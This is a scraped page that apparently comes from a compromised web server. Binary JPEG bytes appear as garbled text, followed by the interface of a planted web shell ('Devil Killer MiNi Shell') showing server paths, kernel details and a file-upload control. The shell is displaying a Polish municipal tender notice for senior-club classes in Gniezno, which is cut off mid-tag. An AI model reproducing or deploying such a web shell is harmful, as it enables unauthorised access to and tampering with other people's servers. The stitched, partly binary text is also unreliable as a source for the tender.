JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240926/0051856401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa prowadzenia zajęć dla uczestników Gnieźnieńskiego Klubu Seniora w Gnieźnie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ W GNIEŹNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 004784518</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dworcowa 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gniezno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">614262582</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mops@mops.gniezno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mops.gniezno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa prowadzenia zajęć dla uczestników Gnieźnieńskiego Klubu Seniora w Gnieźnie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c5f58588-401c-4d41-aaa1-1513d0c31c44</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00518564</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00040397/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Usługa prowadzenia zajęć dla uczestników Gnieźnieńskiego Klubu Seniora w Gnieźnie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Regionalny Fundusze Europejskie dla Wielkopolski 2021 - 2027 tytuł projektu &#34;Gniezno stawia na rozwój usług społecznych&#34; </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c5f58588-401c-4d41-aaa1-1513d0c31c44 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje i wymagania<br/>techniczne i organizacyjne na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia<br/>określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl (link bezpośredni do treści<br/>Regulaminu - https://ezamowienia.gov.pl/pl/regulamin/) oraz informacje zamieszczone w zakładce „Centrum Pomocy” oraz „FAQ”,<br/>dostępne pod adresem https://ezamowienia.gov.pl/pl/komponent-edukacyjny/ . 2) Sposób sporządzenia dokumentów<br/>elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe<br/>odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30.12.2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz.<br/>2452). 3) W przedmiotowym postępowaniu ofertę i oświadczenie, o którym mowa w art. 125 ust. 1 PZP, składa się, pod rygorem<br/>nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym. 4) Dokumenty elektroniczne sporządza się w postaci elektronicznej, w formatach<br/>danych określonych w Rozporządzeniu Rady Ministrów z dnia 12.04.2012 r. w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych (tekst jedn. Dz. U. z 2017 r. poz. 2247) dalej zwane „rozporządzenie KRI”, tj. m.in. .doc, .odt, .docx,<br/>.txt, .xls, .xlsx, .xml, .ppt, .pdf, .jpg, .zip, .7Z., z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 PZP, z uwzględnieniem<br/>rodzaju przekazywanych danych i przekazuje się jako załączniki. 5) Maksymalny rozmiar plików przesyłanych za pośrednictwem<br/>„Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). 6)<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy oraz informacje dotyczące<br/>specyfikacji połączenia określa Regulamin Platformy e-Zamówienia, który stanowi m.in. że w celu prawidłowego korzystania z usług<br/>Platformy e-Zamówienia wymagany jest: 1) Komputer PC o minimalnych parametrach: a) Intel Core2 Duo, 2 GB RAM, HDD; b)<br/>zainstalowany jeden z poniższych systemów operacyjnych: MS Windows 7 lub nowszy lub OSX/Mac OS 10.10 lub Ubuntu 14.04; c)<br/>zainstalowana jedna z poniższych przeglądarek: Chrome 66.0 lub nowsza lub Firefox 59.0 lub nowszy lub Safari 11.1 lub nowsza lub<br/>Edge 14.0 i nowsze albo 2) Tablet/Telefon o minimalnych parametrach: a) 4 rdzenie procesora, b) 2GB RAM, c) Android 6.0<br/>Marshmallow, iOS 10.3, d) Przeglądarka Chrome 61 lub nowsza. 3) Dla skorzystania z pełnej funkcjonalności może być konieczne<br/>włączenie w przeglądarce obsługi protokołu bezpiecznej transmisji danych SSL, obsługi Java Script, oraz cookies; 4) Specyfikacja<br/>połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych: a) specyfikacja połączenia –<br/>formularze udostępnione są za pomocą protokołu TLS 1.2, b) format danych oraz kodowanie: formularze dostępne są w formacie<br/>HTML z kodowaniem UTF-8, c) oznaczenia czasu odbioru danych: wszelkie operacje opierają się o czas serwera i dane zapisywane<br/>są z dokładnością co do sekundy, 5) posiadanie ważnego (aktualnie obowiązującego): kwalifikowanego podpisu elektronicznego do<br/>podpisywania plików w formie elektronicznej lub podpisu zaufanego lub podpisu osobistego do podpisywania plików w postaci<br/>elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza złożenie oferty w postaci katalogu</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia RODO informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest reprezentowany przez Dyrektora Miejski Ośrodek Pomocy Społecznej w<br/>Gnieźnie, ul. Dworcowa 7, 62-200 GNIEZNO, tel. 61 426-25-82, e-mail: mops@mops.gniezno.pl;<br/>2. W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych pod adresem<br/>e-mail: : inspektor@cbi24.pl.<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>4. Dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11 września 2019 r.– Prawo<br/>zamówień publicznych, zwanej dalej PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli<br/>czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy.<br/>5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z przepisami PZP.<br/>6. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 oraz art. 74 ust. 4 PZP.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z PZP.<br/>8. Osoba, której dane dotyczą ma prawo do:<br/>• dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania,<br/>• w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy prawo wniesienia skargi do<br/>organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa,<br/>9. Osobie, której dane dotyczą nie przysługuje:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>• na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych.<br/>10. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie<br/>dużego wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>11. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z PZP.<br/>12. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>13. W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze żądania skierowanego do Administratora.<br/>14. Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku gdy wniesienie żądania, o którym mowa w art. 18 ust.<br/>1 Rozporządzenia, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole i załącznikach do protokołu,<br/>Administrator nie udostępnia tych danych zawartych w protokole i w załącznikach do protokołu, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust. 2 Rozporządzenia.<br/>15. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>Rozporządzenia, nie może naruszać integralności protokołu oraz jego załączników.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AG.3410-13/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie: usługi prowadzenia zajęć plastycznych dla uczestników Gnieźnieńskiego Klubu Seniora w Gnieźnie na potrzeby ośrodka wsparcia pn. „Gnieźnieński Klub Seniora”, współfinansowanego w ramach Programu Regionalnego Fundusze Europejskie dla Wielkopolski 2021-2027, pn.: „Gniezno stawia na rozwój usług społecznych”.<br/>Zamawiający wymaga by w czasie trwania umowy usługę przeprowadzono w następujący sposób:<br/>- w roku 2024 dla jednej grupy,<br/>- w roku 2025 dla czterech grup,<br/>- w roku 2026 dla czterech grup.<br/>1.	Liczba godzin usługi oraz szacowana liczba osób objętych usługami:<br/>1)	w roku 2024 – 30 godzin zegarowych dla 40 osób,<br/>2)	w roku 2025 – 148 godzin zegarowych dla 122 osób łącznie, w tym:<br/>I grupa: 30 godzin dla max 41 osób,<br/>II grupa: 30 godzin dla max 41 osób,<br/>III grupa: 44 godzin dla max 20 osób,<br/>IV grupa: 44 godzin dla max 20 osób.<br/>3)	w roku 2026 – 150 godzin zegarowych dla 122 osób łącznie, w tym: <br/>I grupa: 30 godzin dla max 41 osób,<br/>II grupa: 30 godzin dla max 41 osób,<br/>III grupa: 45 godzin dla max 20 osób,<br/>IV grupa: 45 godzin dla max 20 osób.<br/>2.	Uczestnicy zajęć: osoby w wieku powyżej 60 roku życia.<br/>3.	Termin zajęć: Zajęcia przeprowadzane będą od dnia podpisania umowy do dnia 11 grudnia 2026 r.<br/>4.	Przedmiot zajęć: Zajęcia prowadzone w formie warsztatów. Zajęcia praktyczne, podczas których wykonawca zapozna uczestników z różnymi technikami prac plastycznych np.: bibułkarstwo, koronkarstwo, quillingu, origami, decoupage, tworzenie różnego rodzaju ozdób wielkanocnych, bożonarodzeniowych. Wykonawca zobowiązany będzie do nauki podstawowych technik wyrobów, podczas których uczestnicy zajęć samodzielnie wykonają prace plastyczne. Zajęcia będą mają charakter stacjonarny, aktywizujący, profilaktyczny i terapeutyczny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">80400000-8 - Usługi edukacji osób dorosłych oraz inne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-11</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera w zakresie pracy z seniorami</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie: usługi prowadzenia zajęć ruchowych nordic walking dla uczestników Gnieźnieńskiego Klubu Seniora w Gnieźnie na potrzeby ośrodka wsparcia pn. „Gnieźnieński Klub Seniora”, współfinansowanego w ramach Programu Regionalnego Fundusze Europejskie dla Wielkopolski 2021-2027, pn.: „Gniezno stawia na rozwój usług społecznych”.<br/>Zamawiający wymaga by w czasie trwania umowy usługę przeprowadzono w następujący sposób:<br/>- w roku 2024 dla jednej grupy,<br/>- w roku 2025 dla czterech grup,<br/>- w roku 2026 dla czterech grup.<br/>1.	Liczba godzin usługi oraz szacowana liczba osób objętych usługami:<br/>1)	w roku 2024 – 28 godzin zegarowych,<br/>2)	w roku 2025 – 152 godziny zegarowe dla 122 osób łącznie, w tym:<br/>I grupa: 30 godzin dla max 41 osób,<br/>II grupa: 30 godzin dla max 41 osób,<br/>III grupa: 46 godzin dla max 20 osób,<br/>IV grupa: 46 godzin dla max 20 osób.<br/>3)	w roku 2026 – 152 godziny zegarowe dla 122 osób łącznie, w tym:<br/>I grupa: 30 godzin dla max 41 osób,<br/>II grupa: 30 godzin dla max 41 osób,<br/>III grupa: 46 godzin dla max 20 osób,<br/>IV grupa: 46 godzin dla max 20 osób.<br/>2.	Uczestnicy zajęć: osoby w wieku powyżej 60 roku życia.<br/>3.	Termin zajęć: Zajęcia przeprowadzane będą od dnia podpisania umowy do dnia 30 października 2026 r.<br/>4.	Przedmiot zajęć: Zajęcia praktyczne, w ramach, których odbędą się zajęcia z nordic walking. Uczestnicy będą uczyć się poprawnego używania kijków do nordic walking, jak również poprawią swoją kondycję ruchową. Przedmiotowe zajęcia sprzyjają m.in. rozwijaniu siły ramion i ich wytrzymałości, zwiększenie stabilności przy chodzeniu z kijkami, redukuje nacisk na kolana, biodra, plecy. Regularne ćwiczenie daje korzyści szczególnie dla osób ze słabszymi stawami oraz wśród seniorów. Zaletą zajęć jest spowolnienie procesów starzenia się, poprawienie kondycji wśród seniorów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">80400000-8 - Usługi edukacji osób dorosłych oraz inne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-10-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe trenera</span></h3> <h3 